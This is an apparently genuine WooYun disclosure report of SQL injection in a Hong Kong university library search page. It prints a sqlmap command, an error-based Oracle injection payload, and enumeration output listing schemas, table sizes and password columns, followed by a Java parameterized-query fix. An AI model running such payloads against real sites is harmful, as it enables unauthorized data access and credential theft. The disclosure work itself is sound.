
Vulnerability summary

Defect ID: wooyun-2015-0158869

Title: SQL injection vulnerability in The University of Hong Kong Libraries (1.82 million user records exposed) (Hong Kong region)

Vendor: The University of Hong Kong Libraries

Author: 路人甲

Submitted: 2015-12-07 11:32

Fixed: 2015-12-21 09:37

Published: 2015-12-21 09:37

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organisation (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-12-07: details sent to the vendor; awaiting vendor response
2015-12-10: vendor has confirmed; details visible to the vendor only
2015-12-20: details disclosed to core white hats and domain experts
2015-12-21: vendor has fixed the vulnerability and disclosed it voluntarily; details made public

Summary:

SQL injection vulnerability in The University of Hong Kong Libraries (1.82 million user records exposed)

Details:

URL: http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a

$ python sqlmap.py -u "http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a" -p the_key --technique=E --output-dir=output --random-agent --batch  --no-cast -D NDLC -T EJ_996 --columns


Database: NDLC
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| EJ_996 | 1820120 |


web application technology: JSP
back-end DBMS: Oracle
Database: NDLC
Table: EJ_996
[17 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| NO_USERS | VARCHAR2 |
| SUBFIELDZ_PASSWORD | VARCHAR2 |
| URL_PASSWORD | VARCHAR2 |
+--------------------+----------+


Proof of vulnerability:

---
Parameter: the_key (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: the_key=China Biography'||(SELECT 'JUyI' FROM DUAL WHERE 4168=4168 AND 2419=CTXSYS.DRITHSX.SN(2419,(CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (2419=2419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(107)||CHR(113))))||'&the_field=sb&the_lang=a
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'NDLC'
current user is DBA: False
database management system users [60]:
Database: APEX_030200
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| WWV_FLOW_DUAL100 | 100 |
+--------------------------------+---------+
Database: SYSTEM
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| HELP | 919 |
+--------------------------------+---------+
Database: SYS
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| AW$AWMD | 728 |
| STMT_AUDIT_OPTION_MAP | 268 |
| SYSTEM_PRIVILEGE_MAP | 208 |
| AUDIT_ACTIONS | 177 |
| AW$AWXML | 137 |
| AW$EXPRESS | 101 |
| AW$AWCREATE | 51 |
| AW$AWCREATE10G | 27 |
| AW$AWREPORT | 27 |
| TABLE_PRIVILEGE_MAP | 26 |
| "DUAL" | 1 |
+--------------------------------+---------+
Database: MDSYS
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| SDO_COORD_OP_PARAM_VALS | 9736 |
| SDO_COORD_REF_SYS | 4426 |
| SDO_CS_SRS | 4426 |
| SDO_COORD_OPS | 2279 |
| SDO_COORD_OP_PARAM_USE | 718 |
| SDO_DATUMS | 535 |
| SDO_COORD_OP_PATHS | 365 |
| SDO_COORD_OP_PARAMS | 153 |
| SDO_COORD_AXES | 139 |
| SDO_UNITS_OF_MEASURE | 132 |
| SDO_DATUMS_OLD_SNAPSHOT | 118 |
| SDO_ELLIPSOIDS | 96 |
| SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT | 95 |
| SDO_COORD_OP_METHODS | 85 |
| SDO_COORD_SYS | 65 |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT | 47 |
| SDO_PROJECTIONS_OLD_SNAPSHOT | 42 |
| SDO_COORD_AXIS_NAMES | 28 |
| SDO_PRIME_MERIDIANS | 16 |
| SDO_XML_SCHEMAS | 3 |
| SDO_GEOR_XMLSCHEMA_TABLE | 1 |
+--------------------------------+---------+
Database: NDLC
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| DR$NDLC_INDEX$I | 7103205 |
| BIB_SUBJ | 2012382 |
| EJ_996 | 1820120 |
| BIB_TYPE | 1672433 |
| TITLE | 1669310 |
| DR$NDLC_INDEX$K | 1282960 |
| TMP_BIB | 1196192 |
| FULLTITLE | 571664 |
| DR$NDLC_INDEX$N | 177446 |
| COMPLETELIST_AGGR | 40726 |
| TMP_DEL_REC | 19944 |
| CORE | 1154 |
| SUBJECT_DDC | 1013 |
| TC | 499 |
| LANG | 375 |
| SUBJECT | 131 |
| KEYDB | 101 |
| EJ_991 | 89 |
| LOCATION | 50 |
| DB_SUBJECT | 49 |
| TYPE | 48 |
| TYPE_COUNT | 33 |
| CAT | 28 |
| DR$NDLC_INDEX$R | 22 |
| BROAD_SUBJECT | 10 |
| NOTES | 9 |
| SUBJECT_GP | 9 |
+--------------------------------+---------+
Database: HKUTO
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| LANG | 375 |
+--------------------------------+---------+
Database: CTXSYS
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| DR$OBJECT_ATTRIBUTE | 480 |
| DR$NUMBER_SEQUENCE | 256 |
+--------------------------------+---------+
columns LIKE 'PASS' were found in the following databases:
Database: SYS
Table: KU$_PROFILE_VIEW
[1 column]
+----------------+----------+
| Column | Type |
+----------------+----------+
| PASS_FUNC_NAME | VARCHAR2 |
+----------------+----------+
Database: SYS
Table: EXU9LNKU
[2 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| AUTH_PASSWD | VARCHAR2 |
| PASSWD | VARCHAR2 |
+-------------+----------+
Database: SYS
Table: KU$_ROLE_VIEW
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: ALL_SQLSET_PLANS
[3 columns]
+------------------------+--------+
| Column | Type |
+------------------------+--------+
| ESTIMATED_ONEPASS_SIZE | NUMBER |
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS | NUMBER |
+------------------------+--------+
Database: SYS
Table: EXU8LNKU
[1 column]
+--------+----------+
| Column | Type |
+--------+----------+
| PASSWD | VARCHAR2 |
+--------+----------+
Database: SYS
Table: KU$_USER_VIEW
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: KU$_DBLINK_VIEW
[2 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| PASSWORD | VARCHAR2 |
| PASSWORDX | RAW |
+-----------+----------+
Database: SYS
Table: KU$_10_1_DBLINK_VIEW
[2 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| PASSWORD | VARCHAR2 |
| PASSWORDX | RAW |
+-----------+----------+
Database: SYS
Table: USER_DB_LINKS
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: EXU10LNKU
[4 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| AUTH_PASSWD | VARCHAR2 |
| AUTH_PASSWDX | RAW |
| PASSWD | VARCHAR2 |
| PASSWDX | RAW |
+--------------+----------+
Database: SYS
Table: EXU8USRU
[1 column]
+--------+----------+
| Column | Type |
+--------+----------+
| PASSWD | VARCHAR2 |
+--------+----------+
Database: SYS
Table: USER_SQLSET_PLANS
[3 columns]
+------------------------+--------+
| Column | Type |
+------------------------+--------+
| ESTIMATED_ONEPASS_SIZE | NUMBER |
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS | NUMBER |
+------------------------+--------+
Database: APEX_030200
Table: WWV_FLOW_USERS
[6 columns]
+------------------------------+----------+
| Column | Type |
+------------------------------+----------+
| CHANGE_PASSWORD_ON_FIRST_USE | VARCHAR2 |
| FIRST_PASSWORD_USE_OCCURRED | VARCHAR2 |
| PASSWORD_ACCESSES_LEFT | NUMBER |
| PASSWORD_DATE | DATE |
| PASSWORD_LIFESPAN_ACCESSES | NUMBER |
| PASSWORD_LIFESPAN_DAYS | NUMBER |
+------------------------------+----------+
Database: NDLC
Table: EJ_996
[2 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| SUBFIELDZ_PASSWORD | VARCHAR2 |
| URL_PASSWORD | VARCHAR2 |
+--------------------+----------+


web application technology: JSP
back-end DBMS: Oracle
Database: NDLC
Table: EJ_996
[17 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| BIB | NUMBER |
| COVERAGE | VARCHAR2 |
| FORMAT | VARCHAR2 |
| IP_FILTER | VARCHAR2 |
| LOCATION | VARCHAR2 |
| MEGACD | VARCHAR2 |
| NO_USERS | VARCHAR2 |
| NOTES | CHAR |
| NOTES_URL | VARCHAR2 |
| SUBFIELD_Z | VARCHAR2 |
| SUBFIELDZ_OTHERS | VARCHAR2 |
| SUBFIELDZ_PASSWORD | VARCHAR2 |
| URL | VARCHAR2 |
| URL_OTHERS | VARCHAR2 |
| URL_PASSWORD | VARCHAR2 |
| VIA | VARCHAR2 |
| WF | NUMBER |
+--------------------+----------+

Remediation:

Deploy a WAF.
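A WAF filters the symptom; the root cause of an error-based injection like the one above is user input spliced into the SQL text. The following is an added illustration, not code from the report or from the library's search.jsp (whose source the page does not show): the vulnerable pattern, the ER_RESOURCES table, its columns and the the_field mapping are all assumed placeholders, while the fix (allow-listed column name, bound parameter, escaped LIKE wildcards) is standard JDBC.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

public class ErSearch {
    // Assumed mapping from the_field codes (the URL shows the_field=sb) to column
    // names; ER_RESOURCES and its columns are placeholders, not the real schema.
    private static final Map<String, String> FIELD_COLUMNS = Map.of("sb", "SUBJECT", "ti", "TITLE");

    // Assumed vulnerable pattern: the_key is spliced into the SQL text, so a quote
    // in the parameter closes the literal and the rest (such as the '||(SELECT ...
    // CTXSYS.DRITHSX.SN(...)) chain sqlmap used) runs as SQL on the Oracle backend.
    static String vulnerableQuery(String theField, String theKey) {
        return "SELECT BIB, URL FROM ER_RESOURCES WHERE " + theField + " LIKE '%" + theKey + "%'";
    }

    // Hardened version: the column comes from an allow-list (identifiers cannot be
    // bound), the key is a bound parameter, and LIKE wildcards are escaped.
    static List<String> safeSearch(Connection conn, String theField, String theKey)
            throws SQLException {
        String column = FIELD_COLUMNS.get(theField);
        if (column == null) {
            throw new IllegalArgumentException("unknown search field");
        }
        if (theKey == null || theKey.isEmpty() || theKey.length() > 200) {
            throw new IllegalArgumentException("bad search key");
        }
        String sql = "SELECT BIB, URL FROM ER_RESOURCES WHERE " + column + " LIKE ? ESCAPE '\\'";
        List<String> urls = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, "%" + escapeLike(theKey) + "%"); // data, never SQL text
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    urls.add(rs.getString("URL"));
                }
            }
        }
        return urls;
    }

    // Escape LIKE metacharacters so '%' and '_' typed by a user match literally.
    static String escapeLike(String s) {
        return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_");
    }
}
```

With the bound parameter, a quote or `||` in the_key is just characters inside the pattern, so the ORA error channel that the CTXSYS.DRITHSX.SN payload relied on is never reached.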

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-12-10 17:01

Vendor reply:

The incident has been reported to the relevant organisation

Latest status:

2015-12-21: the relevant organisation reports that the vulnerability has been fixed